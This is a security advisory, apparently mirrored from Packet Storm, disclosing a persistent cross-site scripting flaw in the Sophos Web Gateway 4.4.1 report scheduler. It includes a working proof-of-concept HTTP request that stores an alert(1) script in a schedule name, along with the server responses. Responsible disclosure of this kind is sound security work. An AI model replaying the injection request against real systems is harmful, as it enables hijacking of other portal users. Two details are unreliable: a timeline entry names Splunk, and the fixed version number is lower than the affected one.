Sophos Web Gateway 4.4.1 Cross Site Scripting

2018-01-26T00:00:00
ID PACKETSTORM:146115
Type packetstorm
Reporter Matthew Bergin
Modified 2018-01-26T00:00:00

Description

                                        
                                            `KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability  
  
Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability  
Advisory ID: KL-001-2018-001  
Publication Date: 2018.01.26  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Sophos  
Affected Product: Web Gateway  
Affected Version: 4.4.1  
Platform: Embedded Linux  
CWE Classification: CWE-79: Improper Neutralization of Input During Web  
Page Generation, CWE-80: Improper Neutralization of  
Script-Related HTML Tags in a Web Page  
Impact: Arbitrary Code Execution  
Attack vector: HTTP  
  
2. Vulnerability Description  
  
The report scheduler menu within the management portal  
contains a persistent cross site scripting vulnerability. This  
vulnerability can be used to target other users of the same  
portal.  
  
3. Technical Description  
  
A valid session is required to create the report with the  
persistent cross site scripting payload attached. An example  
attack payload has been included below. This payload is designed  
to trigger an alert box with the number one being displayed.  
  
POST /index.php?c=report_scheduler HTTP/1.1  
Host: 1.3.3.7  
Accept-Language: en-US,en;q=0.5  
X-Requested-With: XMLHttpRequest  
X-Prototype-Version: 1.6.1  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 1190  
DNT: 1  
Connection: close  
  
  
action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d  
  
  
HTTP/1.1 200 OK  
Date: Sat, 29 Jul 2017 16:05:25 GMT  
Server: Apache  
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0  
Pragma: no-cache  
X-Frame-Options: sameorigin  
X-Content-Type-Options: nosniff  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 41  
  
{"status":0,"statusMsg":"Settings saved"}  
  
  
The URL-encoded input being passed in input parameter can be  
decoded to a array containing a single JSON buffer.  
  
  
[{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1",  
"sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday",  
"txt_schedule_name": "test<script>alert(1);</script>", "cb_activate_schedule": "yes", "recipients": "test@test.asdasd",  
"schedule_id": "dGVzdA==", "owner": "admin"}]  
  
  
Within the JSON buffer is a key called txt_schedule_name. The  
value for this key is the name of the scheduled report. This  
value is included in the report schedule list.  
  
  
"txt_schedule_name": "test<script>alert(1);</script>"  
  
The HTML tags are then stored. When the report schedule is  
viewed, the resulting JSON is sent as content-type text/html  
instead of application/json, causing the browser to execute any  
unescaped javascript it contains. The output is HTML-encoded  
with the exception of the txt_schedule_name: value which is  
not sanitized, and the payload triggers.  
  
  
POST /index.php?c=report_scheduler HTTP/1.1  
Host: 1.3.3.7  
Accept: text/javascript, text/html, application/xml, text/xml, */*  
Accept-Language: en-US,en;q=0.5  
X-Requested-With: XMLHttpRequest  
X-Prototype-Version: 1.6.1  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 81  
DNT: 1  
Connection: close  
  
action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd  
  
  
HTTP/1.1 200 OK  
Date: Sat, 29 Jul 2017 16:06:38 GMT  
Server: Apache  
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0  
Pragma: no-cache  
X-Frame-Options: sameorigin  
X-Content-Type-Options: nosniff  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 1365  
  
  
{"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>alert(1);<\/script>","cb_activate_schedule":"yes","recipients":"test@test.asdasd","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul  
id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test<script>alert(1);<\/script>\"><div  
class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\"  
title=\"test<script>alert(1);<\/script>\">test<script>alert(1);<\/script><\/a><\/div><div  
class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div  
title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a  
href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test<script>alert(1);<\/script>\"  
name=\"on_off_test<script>alert(1);<\/script>\" class=\"button small\"><span class=\"buttonLabel small\"  
id=\"on_off_span_test<script>alert(1);<\/script>\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input  
type=\"checkbox\" id=\"chk_test<script>alert(1);<\/script>\"\/><\/div><\/li><\/ul>"}  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has released version 4.3.3.1 of the Web Gateway  
which addesses this issue. Release notes available at:  
  
http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.08.17 - KoreLogic submits vulnerability details to Sophos.  
2017.08.17 - Sophos confirms receipt.  
2017.09.29 - 30 business days have elapsed since the vulnerability  
was reported to Sophos.  
2017.10.17 - KoreLogic requests an update from Sophos.  
2017.10.19 - Sophos informs KoreLogic that they will issue a fix in  
the next maintenance release, scheduled for the end of  
November. Sophos asks KoreLogic to hold disclosure until  
the new version is released.  
2017.10.23 - 45 business days have elapsed since the vulnerability  
was reported to Splunk.  
2017.11.02 - Sophos notifies KoreLogic that the maintenance release  
has gone live.  
2018.01.26 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2018  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`